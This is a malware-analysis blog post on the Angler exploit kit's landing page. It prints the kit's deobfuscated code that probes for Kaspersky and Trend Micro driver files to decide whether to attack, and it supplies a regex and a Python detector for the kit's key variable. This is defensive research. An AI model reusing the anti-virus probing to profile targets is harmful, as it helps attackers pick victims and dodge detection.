Saturday 2 August 2014

Landingpages bites the dust - Angler

Basic structure

The landing page is built up of two stages of obfuscation. At the beginning of the page there are five containers with obfuscated data (one per line), each with its own specific purpose. In the landing page used in this example [pastebin] you will find these five on lines 28-32.

After the five containers comes the function that deobfuscates and executes the code in each container.

The section that follows holds the obfuscated strings used by the code in the containers at the top; among them are the domain and the URIs for the exploits.

The rest of the landing page is simply a decoy to make the page look "legit".

Client identification

Angler does not only use plugin detection to identify vulnerable versions; it also detects installed anti-virus software. This is done by the code in the first container. The code can be found by setting a breakpoint on the line that calls eval() in the deobfuscation function:

[Screenshot: Firefox Web Developer debugger, breakpoint on the eval() call]
The contents of HzV0 give us the code:
  // File-existence probe through MSXML. The XML string passed to loadXML()
  // was lost when this page was extracted; in the kit it references txt, so
  // the parser tries to load the given path and the resulting parse error
  // code reveals whether the file is present on disk.
  function gs7sfd(txt) {
      var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
      xmlDoc.async = true;
      xmlDoc.loadXML('');
      if (xmlDoc.parseError.errorCode != 0) {
          var err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
          err += "Error Reason: " + xmlDoc.parseError.reason;
          err += "Error Line: " + xmlDoc.parseError.line;
          // -2147023083 is 0x80070715 (ERROR_RESOURCE_TYPE_NOT_FOUND): the file
          // could be opened but is not a resource image, so it is treated as present
          if (err.indexOf("-2147023083") > 0) {
              return 1;
          } else {
              return 0;
          }
      }
      return 0;
  }
  // kl1.sys belongs to Kaspersky, the tm*.sys drivers to Trend Micro
  if (gs7sfd("c:\\Windows\\System32\\drivers\\kl1.sys") ||
      gs7sfd("c:\\windows\\system32\\drivers\\tmactmon.sys") ||
      gs7sfd("c:\\windows\\system32\\drivers\\tmcomm.sys") ||
      gs7sfd("c:\\windows\\system32\\drivers\\tmevtmgr.sys") ||
      gs7sfd("c:\\windows\\system32\\drivers\\TMEBC32.sys") ||
      gs7sfd("c:\\windows\\system32\\drivers\\tmeext.sys") ||
      gs7sfd("c:\\windows\\system32\\drivers\\tmnciesc.sys") ||
      gs7sfd("c:\\windows\\system32\\drivers\\tmtdi.sys")) {
      // anti-virus found: set the abort flag and clear every exploit flag
      window['zxtbVDMp'] = true;
      BzJUQufh = '';
      window.sf325gtgs7sfdj = window.sf325gtgs7sfds = window.sf325gtgs7sfdf1 = window.sf325gtgs7sfdf2 = false;
  };


If it finds that Kaspersky (kl1.sys) or Trend Micro (the tm*.sys drivers) is installed, it cancels the intrusion attempt, since the exploit is then likely to fail and would only create unwanted noise (anti-virus alerts). Another interesting detail: if you look at the landing page of RIG you will find that it uses exactly the same code, which originally appeared in "Operation Snowman".

The code in the second container is responsible for checking the versions of the installed plugins, but it also holds the function for decoding the strings listed in the original landing page; the key for that decoding is defined in the variable whose name ends with 0:
[Screenshot: original landing page on the left, code in the second container on the right]
The third container holds the code that generates the code used for loading a Silverlight exploit:
[Screenshot: original landing page on the left, code in the third container on the right]
The same approach is used for the Flash exploit. If none of Silverlight, Flash or Java is found to be installed, it falls back to the Internet Explorer exploit, provided the IE version is above 10.

A summary of all deobfuscated sections can be found on pastebin. [pastebin]

Detection

Angler is one of the kits whose landing page request looks generic; the response, however, is another story, as shown above.

The containers at the top change from instance to instance, but the variables that follow the deobfuscation function (i.e. the variables ending in 0-11) do not; they always follow the same pattern. Some examples:
[Screenshot: three different landing pages]
The most noticeable one is the variable ending in 0, which as shown earlier holds the deobfuscation key, always 20 bytes long. That suggests the pattern:
/[A-Za-z]{6}([0-9])?0\s=\s'[A-Za-z0-9]{20}',\x0a/
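To see how the pattern behaves on realistic input, here is an added Python example; it is neither the author's script nor code from the kit. The sample bodies are constructed, and the variable names and placeholder values in them are assumptions rather than material from a live landing page. It also goes one step further than the pattern itself: once the key variable is found, it collects the sibling variables 0-11 that share its prefix, which is what a decoder needs next.

```python
import re

# The post's pattern, verbatim: a six-letter name, an optional digit and a
# trailing 0, assigned a 20-character alphanumeric key, then ",\n" because
# the next sibling variable follows on the next line.
ANGLER_KEY_RE = re.compile(r"[A-Za-z]{6}([0-9])?0\s=\s'[A-Za-z0-9]{20}',\x0a")

# The same pattern with the variable name and the key captured, so the key
# can be handed on to a string decoder.
KEY_CAPTURE_RE = re.compile(r"([A-Za-z]{6}[0-9]?0)\s=\s'([A-Za-z0-9]{20})',\n")


def looks_like_angler(page):
    """True if the response body carries the key-variable assignment."""
    return ANGLER_KEY_RE.search(page) is not None


def find_angler_keys(page):
    """Return (variable name, key) for every key-variable assignment found."""
    return [(m.group(1), m.group(2)) for m in KEY_CAPTURE_RE.finditer(page)]


def sibling_assignments(page, key_var):
    """Collect the variables that share the key variable's prefix.

    The post notes that the variables after the deobfuscation function end
    in 0..11; given the name of the one ending in 0, this returns the values
    assigned to prefix0 .. prefix11, keyed by that number.
    """
    prefix = re.escape(key_var[:-1])
    found = {}
    for m in re.finditer(prefix + r"(\d{1,2})\s=\s'([^']*)'", page):
        n = int(m.group(1))
        if n <= 11:
            found[n] = m.group(2)
    return found


# Constructed sample bodies (not real Angler pages). The first mimics the
# variable list that follows the deobfuscation function; the obfuscated
# values are placeholders chosen for this example.
SAMPLE_ANGLER = (
    "var gsfdRq0 = 'kTh6JgQsZ2Pv8YaLmN3w',\n"
    "gsfdRq1 = 'Q3FuY3Rpb24gKCkgew==',\n"
    "gsfdRq2 = 'd2luZG93Lmxl',\n"
    "gsfdRq11 = 'aHR0cDovLw==';\n"
)
# Variant with the optional digit before the trailing 0.
SAMPLE_ANGLER_DIGIT = "var qwErtY50 = 'A1B2C3D4E5F6G7H8I9J0',\nqwErtY51 = 'x';\n"
# Benign page: same shape of variable list, but no 20-byte key.
SAMPLE_BENIGN = "var config0 = 'abc',\nconfig1 = 'def';\n"

if __name__ == "__main__":
    for name, body in (("angler", SAMPLE_ANGLER),
                       ("angler-digit", SAMPLE_ANGLER_DIGIT),
                       ("benign", SAMPLE_BENIGN)):
        print(name, looks_like_angler(body), find_angler_keys(body))
        for var, _key in find_angler_keys(body):
            print("  siblings of", var, sibling_assignments(body, var))
```

One caveat worth keeping in mind when turning the pattern into a rule: it has no left-hand boundary, so a name of seven or more letters followed by 0 (for example abcdefgh0) also matches because the last six letters satisfy [A-Za-z]{6}. Putting \b in front tightens it if that turns out to produce false positives on your traffic.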


Resources

For those who use Snort/Suricata and only capture the triggering packet, this script can help decode the strings and reveal the source domain. [pastebin]

More examples of Angler can be found at malware-traffic-analysis.net
